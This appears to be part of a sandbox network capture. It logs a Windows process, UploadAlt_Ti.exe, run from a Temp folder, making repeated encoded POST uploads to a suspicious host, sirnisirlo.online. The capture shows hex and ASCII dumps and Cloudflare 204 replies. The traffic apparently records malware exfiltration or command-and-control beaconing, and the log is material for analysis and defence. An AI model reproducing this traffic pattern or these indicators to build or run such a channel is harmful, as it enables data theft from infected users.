2024-11-14 18:58:34 UTC	15331	OUT	Data Raw: be 80 78 fe 74 d6 b6 70 82 d6 b4 88 f8 84 68 82 d2 de 78 dc 7a f4 c2 80 92 d6 ca c6 8e d6 94 be ba ba 9c dc 78 92 be d6 ea bc 88 8a ca 7c 74 d2 cc 96 f0 92 d0 fe 9a 9c 88 de 78 c2 74 9e d0 be 7c 70 de 9e c0 be 6a bc 8e c8 ea b8 9e c6 7c 8c fa ca be ca 7a ea c8 c2 f8 fe c6 b4 84 9a ac bc f2 be 90 ca e8 b4 f2 b8 ec 90 ce c2 de 84 72 88 a8 e8 9c dc b4 7e bc de 8e ac fe bc b2 82 cc 9e 4e 68 88 da 80 9a f0 6a ea d6 74 74 f4 8c a8 9c 76 f0 68 7e c0 86 f0 bc 86 94 70 6a c0 d0 9c 8e fa de 9a c6 d4 c6 c0 9e f8 bc a8 f4 78 bc bc ca f0 b2 f4 de d0 c8 ea 82 c2 e8 46 b0 8c 88 c6 b4 c4 c6 e8 bc b6 8e ce 92 aa d6 f8 92 c6 68 fc 8c 68 9e f0 88 78 8e 90 c8 86 f8 ce be 4e d6 f2 d6 da 74 d4 b4 b4 dc b0 86 9e ea 6a da 7c f0 c6 d4 80 78 86 cc b0 88 76 ba 82 78 b8 9e a8 dc d0 Data Ascii: xtphxzx\|txt\|pj\|zr~Nhjttvh~pjxFhhxNtj\|xvx
2024-11-14 18:58:34 UTC	15331	OUT	Data Raw: 96 88 ec 68 e8 92 be 86 f4 70 f4 c4 9c 86 ce 96 b6 9c 72 b2 f2 fa 6a dc 8c 72 b8 fc fc ac 86 d0 fa cc de 7c ba e8 90 c2 b0 cc 90 7e 7c ba da f6 f4 74 d2 72 aa 72 c0 84 cc 82 9e d0 d2 72 ea 72 7e 7c c4 a8 80 ec ea 80 c8 fe c2 bc c8 f4 ba de 7c 72 b8 de 7c 88 72 f2 6a 80 c6 aa 4e 7e f2 bc bc 92 b2 be 94 b2 c4 b2 f2 ca a8 fa 8e 84 f0 80 92 82 68 84 f4 d0 80 fe ca 6a ac 46 7c d2 d4 fc d2 88 e8 4e f2 c8 6a da 7c aa 72 88 ce dc b8 72 a8 d6 90 d4 7e e8 46 e8 d4 de b0 7e c2 68 cc 7e fc 7c b2 d2 74 9e b4 ca fe f8 c0 82 70 dc c2 ac c4 ba d4 4e 7a 46 82 f4 e8 b0 ac 94 c2 aa 68 ea 82 ec 6a d6 72 c4 ec 92 ec 9c 92 ec dc ea 8a ec 46 6a c2 78 72 46 94 c6 cc 72 c4 d4 68 f0 74 a8 aa c8 96 c4 bc ac ea 7c ca ac f6 7c fa f0 da 92 d6 b4 fc dc 96 b0 94 dc e8 96 ea dc e8 7c ec Data Ascii: hprjr\|~\|trrrr~\|\|r\|rjN~hjF\|Nj\|rr~F~h~\|tpNzFhjrFjxrFrht\|\|\|
2024-11-14 18:58:34 UTC	15331	OUT	Data Raw: 86 90 de ba be 90 b0 82 ba d4 f2 9e 84 dc 8e 80 9a a8 ba a8 4e 86 82 8a 94 ca 8c d0 c8 d4 c8 bc 70 fa 8e c6 82 78 bc b4 be c2 9a b6 ca 84 c0 78 f6 90 90 86 d4 8a 68 70 82 7c bc b4 9c ba 8c d2 90 9e aa ac b6 ec ea d6 ca f0 8e be ce ac d0 9a ba b8 ca c6 74 da b0 c4 92 be 8a c8 f0 d2 a8 d6 f4 c2 9c da 74 d6 fc f0 72 9c 84 70 ca d4 90 d2 70 bc fa ce de 7a 9c f0 70 9a de f8 b0 b2 de 9a 7e 82 84 f6 9e aa c4 dc 8a c4 c2 92 8a 82 c8 ba 76 dc 8e 82 96 9c 9e ca f8 88 8c 92 94 86 96 ac d6 da c4 cc fa 82 c0 96 84 de 94 f2 d6 9a cc b6 ea dc de 82 9c a8 7e ce b4 46 9e 74 c2 de cc ce 8c c4 d6 7a 78 b0 9c da 9c 8a b4 e8 46 c2 96 9c d0 7a fa 9c de fe 8c e8 de b8 d6 82 80 c6 f8 94 b4 9a c6 68 72 fe c8 b2 96 b6 f6 a8 a8 90 6a aa 96 b0 fc 86 92 ea 9a 92 b6 ba 70 b6 80 9a ca Data Ascii: Npxxhp\|ttrppzp~v~FtzxFzhrjp
2024-11-14 18:58:34 UTC	15331	OUT	Data Raw: 72 84 b0 cc ec ec be b8 6a 74 4e 4e 82 fa b0 9a ac 74 de f2 a8 90 8c c0 dc fe f0 f0 a8 ac b8 c8 c6 92 f4 80 a8 82 b8 8c cc 82 c2 90 9a 7c 8e 7e fc 86 ba 9a d2 c2 f8 78 d2 72 82 88 8a f4 ca fe 9a fa b0 fe b6 ac c8 7a c0 46 70 ea 7e fa b8 f2 9e 7c 7e b6 7c 7a 74 be e8 d0 d6 ec c4 d4 86 90 84 4e e8 fa cc 46 d2 74 8e 68 d4 96 b6 74 92 b0 d0 ea d6 b8 9c ec ac 84 d0 f4 90 76 f8 c6 e8 b8 b4 7c 84 46 b2 ec b0 b4 8a 7c 92 46 b2 ec cc cc 88 88 c8 4e 8c 92 cc 76 fa b8 82 be c0 80 7a ce d0 aa ac 70 7e cc fe d6 ca 92 ec f2 b8 ba b4 b8 9a aa 78 aa ba b6 b8 bc ac d2 4e d6 c8 d4 9c 94 76 86 9e e8 68 9e b2 76 68 dc fe 8c b4 f8 c2 e8 76 90 92 bc b4 7c 8e e8 f4 c0 f4 c4 e8 ce b6 9a cc ea e8 d4 86 b0 e8 82 78 74 72 7c 94 f8 f8 ce 7e c6 ba 72 f4 b8 be 76 c0 76 8a b6 f4 fc d0 Data Ascii: rjtNNt\|~xrzFp~\|~\|ztNFthtv\|F\|FNvzp~xNvhvhv\|xtr\|~rvv
2024-11-14 18:58:35 UTC	718	IN	HTTP/1.1 204 No Content Date: Thu, 14 Nov 2024 18:58:35 GMT Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=evA1O4R0OH2%2FlBr%2FtEu3IjGhsNT%2BaTFr1vPjByJeKuiZX%2Fh1oRVLGMGzgsGX5xNVTO0ZcJBw%2Ft7sHSTtPkcuTqqh7qrau6USHzqSTKy3VrVaa3aGGbApfWea9AKYwQI2BctmWg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e293bd5d8da642e-SJC alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=39436&sent=249&recv=711&lost=0&retrans=0&sent_bytes=2841&recv_bytes=684450&delivery_rate=73153&cwnd=32&unsent_bytes=0&cid=aa2ef966c0bfd962&ts=1150&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.8	58024	188.114.96.3	443	4032	C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-14 18:58:36 UTC	418	OUT	POST /heavywater.html?knrb8plcews=n4J9xYoI8zATTauyjybQwY5kv8nn2lD2hzX%2FvxzkAN6GXIBiaicSeOB4iSjf20YELqnF21GZYAtcxOy3nMycxQ%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 match: 7dyqhKnmRARBOgJzE12PrKIWC1yisvlEdKSc/NC6SHSNMC3vKFLQ2Wru8KhU2kw03n0Uvg Content-Length: 745 Host: sirnisirlo.online
2024-11-14 18:58:36 UTC	745	OUT	Data Raw: fd ff ff ff 03 00 00 00 00 00 00 00 00 00 00 00 92 00 01 5d e2 73 3d 95 00 00 00 88 00 00 00 08 00 00 00 72 3b 04 fa 7a 9d 99 3c a2 dd fe 62 1e 18 18 18 18 18 18 18 18 18 18 18 3d 99 39 a2 dd fe 62 dc 18 18 18 18 18 18 18 18 18 18 18 b8 8e 14 14 40 18 18 18 18 18 18 18 42 18 42 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 b8 8e 14 16 18 18 18 18 18 18 18 18 18 18 18 18 1a 18 18 18 b8 8e 12 14 18 18 18 18 e7 e7 e7 e7 e7 e7 e7 e7 e7 e7 e7 e7 18 18 e7 e7 e7 e7 e7 e7 e7 e7 e7 e7 e7 e7 e7 e7 e7 e7 17 e9 98 1f a7 00 00 00 88 00 00 00 08 00 00 00 72 3b 04 fa 7a 9d 99 3c 36 cb 29 26 32 18 18 18 18 18 18 18 18 18 18 18 3d 99 3d 33 99 1c 1a 5f 3d 99 18 59 33 99 1a 1a 5f 3d 99 18 59 36 cb Data Ascii: ]s=r;z<b=9b@BBr;z<6)&2==3_=Y3_=Y6
2024-11-14 18:58:36 UTC	711	IN	HTTP/1.1 204 No Content Date: Thu, 14 Nov 2024 18:58:36 GMT Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q7UnAO6%2FOowm%2Fy5ZZJ6LvhcYVq%2FlRLLehnZtJPQtUXv9aCtczO773JKxebm62dvRdyy9xU0oR%2B2rMNYT6lY0WR8hvYNy07AicPg4alRgd4KpGaPLfwF3tf8IsYXy4qfZPEc7%2BQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e293be1c966ec02-SEA alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=54693&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2842&recv_bytes=1799&delivery_rate=52967&cwnd=32&unsent_bytes=0&cid=54f081aafbc947db&ts=552&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.8	58025	188.114.96.3	443	4032	C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-14 18:58:37 UTC	418	OUT	POST /heavywater.html?knrb8plcews=n4J9xYoI8zATTauyjybQwY5kv8nn2lD2hzX%2FvxzkAN6GXIBiaicSeOB4iSjf20YELqnF21GZYAtcxOy3nMycxQ%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 match: 7dyqhKnmRARBOgJzE12PrKIWC1yisvlEdKSc/NC6SHSNMC3vKFLQ2Wru8KhU2kw03n0Uvg Content-Length: 212 Host: sirnisirlo.online
2024-11-14 18:58:37 UTC	212	OUT	Data Raw: fd ff ff ff 03 00 00 00 00 00 00 00 00 00 00 00 92 00 01 a7 1a cc 30 99 00 00 00 88 00 00 00 08 00 00 00 72 3b 04 fa 7a 9d 99 3c 57 2c 81 78 16 18 18 18 18 18 18 18 18 18 18 18 3f 99 99 3d 99 3b 18 57 2c 81 78 dc 18 18 18 18 18 18 18 18 18 18 18 b8 8e 14 14 40 18 18 18 18 18 18 18 42 18 42 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 b8 8e 14 16 18 18 18 18 18 18 18 18 18 18 18 18 1a 18 18 18 b8 8e 12 14 18 18 18 18 e7 e7 e7 e7 e7 e7 e7 e7 e7 e7 e7 e7 18 18 e7 e7 e7 e7 e7 e7 e7 e7 e7 e7 e7 e7 e7 e7 e7 e7 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii: 0r;z<W,x?=;W,x@BB
2024-11-14 18:58:38 UTC	707	IN	HTTP/1.1 204 No Content Date: Thu, 14 Nov 2024 18:58:38 GMT Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U%2B%2FxXE84DMfstpi7s1KPVknYebBTgWUFpwx7popeOexKZJBO48S8RX4kz5xczbClirKYfh66azbnImoG1kmaqYZgguyXHOIYxfS%2B2Uk9Tas1FZD4brDHjCZAr4OH3fx1AhxeaA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e293be98c8b24d6-SJC alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=38823&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2841&recv_bytes=1266&delivery_rate=74523&cwnd=32&unsent_bytes=0&cid=06a7a65bb045fda1&ts=512&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.8	58026	188.114.96.3	443	4032	C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-14 18:58:38 UTC	418	OUT	POST /heavywater.html?knrb8plcews=n4J9xYoI8zATTauyjybQwY5kv8nn2lD2hzX%2FvxzkAN6GXIBiaicSeOB4iSjf20YELqnF21GZYAtcxOy3nMycxQ%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 match: 7dyqhKnmRARBOgJzE12PrKIWC1yisvlEdKSc/NC6SHSNMC3vKFLQ2Wru8KhU2kw03n0Uvg Content-Length: 380 Host: sirnisirlo.online
2024-11-14 18:58:38 UTC	380	OUT	Data Raw: fd ff ff ff 03 00 00 00 00 00 00 00 00 00 00 00 92 00 01 a9 c5 15 39 95 00 00 00 88 00 00 00 08 00 00 00 72 3b 04 fa 7a 9d 99 3c 4b 93 32 6a 1e 18 18 18 18 18 18 18 18 18 18 18 3d 99 39 4b 93 32 6a dc 18 18 18 18 18 18 18 18 18 18 18 b8 8e 14 14 40 18 18 18 18 18 18 18 42 18 42 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 b8 8e 14 16 18 18 18 18 18 18 18 18 18 18 18 18 1a 18 18 18 b8 8e 12 14 18 18 18 18 e7 e7 e7 e7 e7 e7 e7 e7 e7 e7 e7 e7 18 18 e7 e7 e7 e7 e7 e7 e7 e7 e7 e7 e7 e7 e7 e7 e7 e7 3d 11 46 35 94 00 00 00 88 00 00 00 08 00 00 00 72 3b 04 fa 7a 9d 99 3c 62 3a 94 72 1c 18 18 18 18 18 18 18 18 18 18 18 3b 39 62 3a 94 72 dc 18 18 18 18 18 18 18 18 18 18 18 b8 8e 14 14 40 Data Ascii: 9r;z<K2j=9K2j@BB=F5r;z<b:r;9b:r@
2024-11-14 18:58:39 UTC	719	IN	HTTP/1.1 204 No Content Date: Thu, 14 Nov 2024 18:58:39 GMT Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VCjQfnwJBtHuK9KHHg%2B6IBUZqhIZ6xBaDrnNq4Rrwc%2FFwrSRvIzZ46MBAlUl%2F4waW4XZh3t%2BOE0AxaurS4u9HF%2BJbKX99BAOcUHJ2t3ks%2FvVgNV%2BerCgDgFeE7z5EMiz8M%2F2zQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e293bf10961e7c3-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1403&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2842&recv_bytes=1434&delivery_rate=2005540&cwnd=239&unsent_bytes=0&cid=30383ef6f104dcd0&ts=314&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.8	58027	188.114.96.3	443	4032	C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-14 18:58:39 UTC	417	OUT	POST /heavywater.html?knrb8plcews=n4J9xYoI8zATTauyjybQwY5kv8nn2lD2hzX%2FvxzkAN6GXIBiaicSeOB4iSjf20YELqnF21GZYAtcxOy3nMycxQ%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 match: 7dyqhKnmRARBOgJzE12PrKIWC1yisvlEdKSc/NC6SHSNMC3vKFLQ2Wru8KhU2kw03n0Uvg Content-Length: 35 Host: sirnisirlo.online
2024-11-14 18:58:39 UTC	35	OUT	Data Raw: fd ff ff ff 03 00 00 00 00 00 00 00 00 00 00 00 92 00 01 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii:
2024-11-14 18:58:40 UTC	709	IN	HTTP/1.1 204 No Content Date: Thu, 14 Nov 2024 18:58:40 GMT Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=41Vip0WyyO0%2Fjp9kfHU2pQSENiKlH3PsROiBYUuB9unsfYnyR69NeFwWt8whbTGAL9Gmmo%2FuIShvAlXtj5wdlbSSqL3%2F337m1vqwfv%2Fk9gu0EYy1ckhLnIZzLJWBNtuqJAK4ng%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e293bf7b8c7679e-SJC alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=40762&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1088&delivery_rate=70910&cwnd=32&unsent_bytes=0&cid=97da26de0770df5b&ts=520&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.8	58028	188.114.96.3	443	4032	C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-14 18:58:41 UTC	420	OUT	POST /heavywater.html?knrb8plcews=n4J9xYoI8zATTauyjybQwY5kv8nn2lD2hzX%2FvxzkAN6GXIBiaicSeOB4iSjf20YELqnF21GZYAtcxOy3nMycxQ%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 match: 7dyqhKnmRARBOgJzE12PrKIWC1yisvlEdKSc/NC6SHSNMC3vKFLQ2Wru8KhU2kw03n0Uvg Content-Length: 95622 Host: sirnisirlo.online
2024-11-14 18:58:41 UTC	15331	OUT	Data Raw: fd ff ff ff 03 00 00 00 00 00 00 00 00 00 00 00 92 00 01 69 89 19 2b 4b 75 01 00 88 00 00 00 08 00 00 00 72 3b 04 fa 7a 9d 99 3c ca 0b 2a 4e e3 04 18 18 18 18 18 18 18 18 18 18 2f 99 55 7c 7a 74 68 74 72 55 c8 f2 dc d2 fc f0 3f 0c 18 83 8c d2 3b 3d 83 12 18 83 10 18 87 18 18 18 1a e7 f1 18 18 ab 54 8a c4 f0 d2 c0 48 bc 4a 58 9e c6 fc d2 48 b0 82 4a 7c 58 9e b8 b2 58 74 74 78 78 58 98 58 7c 44 70 78 58 96 88 ec 3b 67 82 ca de fc c6 fe c6 d4 f0 58 9c da fe ca de 58 90 ca fe f8 c0 da ea 58 9a d0 da f8 f0 d2 fc 99 9f a1 18 9b 59 55 be ea fe f0 d2 c2 49 bc d2 d6 ca fe f0 fc ea 49 fe c2 fe fe 44 d2 e8 d2 4b de fe fc fe fe 44 d2 e8 d2 4f f6 ca c4 ca c4 ca f0 44 d2 e8 d2 4b de fe fc fe fe 44 d2 e8 d2 41 f6 ca c4 c0 c6 d6 c6 c4 44 d2 e8 d2 41 fe d2 fc f4 ca de d2 Data Ascii: i+Kur;z<*N/U\|zthtrU?;=THJXHJ\|XXttxxXX\|DpxX;gXXXYUIIDKDODKDADA
2024-11-14 18:58:41 UTC	15331	OUT	Data Raw: 4f 40 a4 6b 79 6d 8d 5a 44 30 16 67 bd 2c 53 b0 7d b1 b2 47 55 84 3e cb cc 75 ca cb 1a 4f cf a3 db f6 fd 18 93 6f f9 60 7d 63 8e 9d a2 b4 3e f4 6d 89 8d b9 30 99 76 c9 73 f4 ff 4c 32 e8 c5 6d 36 9e e1 21 c3 c0 78 25 ab d4 56 76 26 e0 5a f8 de 51 35 32 b7 7d 4a 62 8c 12 15 bf 79 0e 45 b4 fe ec 54 89 f4 79 f8 a4 3e d2 c5 6f bd 4c 71 e9 db 41 5d bf f3 16 33 9e 4e dd 12 b6 71 98 89 f5 99 f5 25 25 b9 10 20 29 b5 db 3f cd 55 20 14 6f 7f 25 e3 63 cb a3 25 6a 6b fd d7 fe ab 3b 81 80 dc 8a 9e 49 1b 9c a5 53 e4 6a db 1c 15 83 fd 8f cf 4a 97 7a 21 55 56 87 0c 75 8d 26 b3 b8 1b e9 44 50 32 48 67 c4 e2 9d db d4 42 29 bb 45 f0 b7 33 c8 6c b7 be 66 73 48 22 05 fb 8c 51 1c d0 9e a4 75 e3 18 8c a9 09 1e 13 45 3f 5c 43 da 71 5a 24 ee 8f ee 83 4b f0 fb 7c 21 6b da f7 8f 7f Data Ascii: O@kymZD0g,S}GU>uOo`}c>m0vsL2m6!x%Vv&ZQ52}JbyETy>oLqA]3Nq%% )?U o%c%jk;ISjJz!UVu&DP2HgB)E3lfsH"QuE?\CqZ$K\|!k
2024-11-14 18:58:41 UTC	15331	OUT	Data Raw: 41 df 6b 25 54 08 96 84 b0 27 c2 11 c2 41 e6 39 fd dc 52 7f 1e bc 3e bd 6b 29 55 fa 1d da f4 ba e3 04 ba d0 fd 1e 82 00 31 28 75 c5 20 36 4d d0 34 73 62 84 1f bb 7a 94 f3 6f db e1 e4 eb 5f 68 c6 8a b5 3c d6 bd 41 ee ef 35 07 0f c5 af 6b b3 ad 54 84 d0 c8 fb ff bc cd 9b 32 2c e5 1a 49 19 e5 0c c2 70 ef fe 84 6a 0c 65 75 17 0c a8 53 07 51 c5 a0 60 c1 ef 05 ca de bd c8 37 d0 01 7c d0 c8 3d ee e8 11 dc bd 69 28 92 fb 20 0e 1d 84 6f 9e a8 d6 de 14 98 7c 7a aa 33 12 9f b2 c1 22 29 26 75 c5 29 fe 51 23 6b 29 88 c4 f9 ae 35 f4 da 7e 26 e6 e3 ad 21 a0 33 8d d7 a4 51 84 24 60 82 2d 2d f8 4a a7 7d 84 c6 27 75 23 ae c1 14 b1 0f f0 7e fa 6e 17 89 77 10 15 5c 17 dd 28 f5 8b 49 a9 82 00 4f 1b 66 63 67 41 66 0e e2 09 93 e0 6e 5e 1c 80 08 5b 6e a2 74 db 99 c1 e8 b0 ad 4b Data Ascii: Ak%T'A9R>k)U1(u 6M4sbzo_h<A5kT2,IpjeuSQ`7\|=i( o\|z3")&u)Q#k)5~&!3Q$`--J}'u#~nw\(IOfcgAfn^[ntK
2024-11-14 18:58:41 UTC	15331	OUT	Data Raw: ba 55 b5 07 51 fb 71 17 b9 97 8a db 75 cc 24 d4 21 3d b0 98 27 0c b0 6f bc 1b 21 71 c6 00 97 bf 33 b8 6e 4c f8 d3 3c d2 15 0c 40 b9 67 42 ce fb e5 bc a2 69 73 77 d1 75 09 d1 23 96 8b ac 47 36 f5 30 58 04 6a 7b 80 0d 75 b9 40 60 2a 4e 9d 29 27 e8 47 ef dc d4 ba 9a 2d 8a e4 35 df f2 7a 95 00 5f 18 4c 38 43 a8 0c 22 7d 87 83 86 31 1f 3c e6 af 55 6a 25 67 8f ce 55 19 c1 31 5e 4c 6e 64 69 ee 8a 6e b8 06 9d 44 67 9e 50 8c 4c 28 9d 85 3d c2 fe fc 52 1d 9c df dc 66 53 f8 12 9a 7e b2 ee 38 f1 e5 ec 58 51 92 d0 af 67 40 cd 67 f4 cc e6 3f c1 e7 d7 95 55 14 9c 9d 18 65 67 de 1f 0f ef b6 5c e5 f1 96 e0 57 9e f4 2d 01 9c 9d 84 8f 1b 3c 80 bc 78 f5 e0 0b c4 05 bf 99 9d 0b 68 52 fc 1e 10 20 e9 42 22 a7 7d 05 74 ed 71 e5 22 1b 1e d7 e7 f3 e9 66 d3 17 17 ca 1b bc ae fa 57 Data Ascii: UQqu$!='o!q3nL<@gBiswu#G60Xj{u@`*N)'G-5z_L8C"}1<Uj%gU1^LndinDgPL(=RfS~8XQg@g?Ueg\W-<xhR B"}tq"fW
2024-11-14 18:58:41 UTC	15331	OUT	Data Raw: 3d 57 28 08 72 1e c3 38 7f cd 67 54 ee 2b 0c 00 7e b8 01 e7 da cc 8b d6 23 c9 5b 1c 34 60 11 fd 06 a7 20 07 13 7f d9 ee 82 5c 0c 0a 14 42 89 3e 12 be 2f 13 84 2f 8c cb af 08 b6 cf 02 dd e3 80 62 da 7e 30 ec c2 aa 6f 5d fd bd e4 26 12 0d 16 1d c5 03 c2 58 71 b0 86 20 c7 8d 42 ce 3e 6b 33 4b 18 57 cc 55 79 98 38 08 93 c5 79 2b 27 53 16 2b 0f af 85 5a fc 2a 14 d2 9c 30 89 60 e8 18 c7 12 e2 0c c5 71 a4 b0 b7 8d b7 6f a1 fe 65 c2 94 d0 15 e5 23 70 f7 82 4c 19 e0 2f f5 b3 e0 5a 8c 8c ff c3 37 af 66 d6 45 a2 65 2a d6 81 cb a1 c0 16 24 ca 61 8d 66 8e 2f 9f b4 12 fe 7e c4 c3 46 f2 92 37 af 83 60 e3 fb f2 a7 d0 21 9f c0 c5 34 57 fd 84 de 82 e6 d9 6f ff 3b 1e 9c 96 79 47 35 d4 c3 8c 48 23 11 d6 62 dc 1e 6a 44 14 76 c8 9e 73 38 d2 30 85 ad 6c 66 63 33 03 6d 8f 34 6c Data Ascii: =W(r8gT+~#[4` \B>//b~0o]&Xq B>k3KWUy8y+'S+Z0`qoe#pL/Z7fEe$af/~F7`!4Wo;yG5H#bjDvs80lfc3m4l
2024-11-14 18:58:41 UTC	15331	OUT	Data Raw: 35 7d 64 fd a2 58 cf a0 c9 71 60 de 30 17 39 43 a1 df a6 19 07 4d 6d aa 9d 07 3b c6 24 1c d7 6c 17 9a 6e b2 72 15 98 11 d0 c1 44 81 43 8e 91 62 92 4c af f3 9f f4 a4 f4 5b 94 61 bb bd c9 d9 89 ad 5a 32 d9 86 0d 90 13 2b 41 6f 51 80 22 02 6c 5b d6 f8 1a da 4d 8b 67 83 42 a4 87 ab 66 18 e8 2e 72 db 3d 26 10 db 27 4a 76 60 d6 ac cc 3d 77 ac cf 9e ac 89 ec eb ab 56 ca 07 a6 64 db f4 2b 3b 60 ee eb 7b 1a 67 68 e3 f2 ac 67 a6 81 36 3d a5 e7 c5 b8 23 82 9f 84 9c 56 a7 4f be 1a 52 6e 4c b9 00 bf f2 f7 c3 91 e8 b3 3b f1 12 7e 72 96 9e 17 07 b7 04 7c 14 cc 44 7b 29 cc b5 55 82 f7 2e 54 3f 06 e2 bd 40 d2 6d 8e fe 81 db cc 54 2c 61 4a c1 f6 44 72 54 7e 54 89 11 f4 bd 7d d0 c2 05 b6 75 a0 20 e3 71 eb eb 5b 6d be 45 d1 8f 05 13 3a 75 cd e9 29 59 6a 6e 73 7b 62 b3 f8 47 Data Ascii: 5}dXq`09CMm;$lnrDCbL[aZ2+AoQ"l[MgBf.r=&'Jv`=wVd+;`{ghg6=#VORnL;~r\|D{)U.T?@mT,aJDrT~T}u q[mE:u)Yjns{bG
2024-11-14 18:58:41 UTC	3636	OUT	Data Raw: 6e 46 05 1d e5 bc ca d7 7e ff 95 7a dc 0d 55 47 8e 62 23 32 24 89 01 4d 7f 05 61 60 7c 27 66 36 e1 d1 db f3 72 45 91 e5 91 06 7d ba 8c 6d 9f 0b 35 7d 46 4d 24 b7 b3 65 ed 3d c0 d1 56 f0 99 86 2b db ed a2 44 20 b5 0a 83 a4 86 a5 07 62 dd 66 3c 53 a0 d4 7a 6c bc c1 ad c0 e5 7d ef 92 4a 7e ee e1 d6 15 a3 48 49 84 8f 5f e4 66 63 59 a3 c5 36 46 8f c9 86 69 63 b8 75 23 37 37 7e fe 21 33 15 31 45 50 97 22 a4 7b bb d1 17 a7 79 02 f2 cd 23 20 2f 5e 47 b6 b6 12 4d f8 1f ff 8a 53 be 07 bb bf dd 08 65 56 44 76 60 87 e5 fc 28 64 3f ef 14 fb 8a 79 55 44 cf ef 3d c8 6c 15 28 cd ce 1a d7 4d 49 78 bb d0 d9 0e db 0c d2 63 7a c0 a0 f8 41 62 f0 24 c5 6c 02 f6 a9 b9 86 1a a6 e7 be 52 ac 50 98 3e 4a 7d f9 6e aa 3f 5b e4 d7 c0 a9 b8 22 3e e9 42 77 b8 9b 95 eb f4 e7 fd 3a e5 30 Data Ascii: nF~zUGb#2$Ma`\|'f6rE}m5}FM$e=V+D bf<Szl}J~HI_fcY6Ficu#77~!31EP"{y# /^GMSeVDv`(d?yUD=l(MIxczAb$lRP>J}n?[">Bw:0
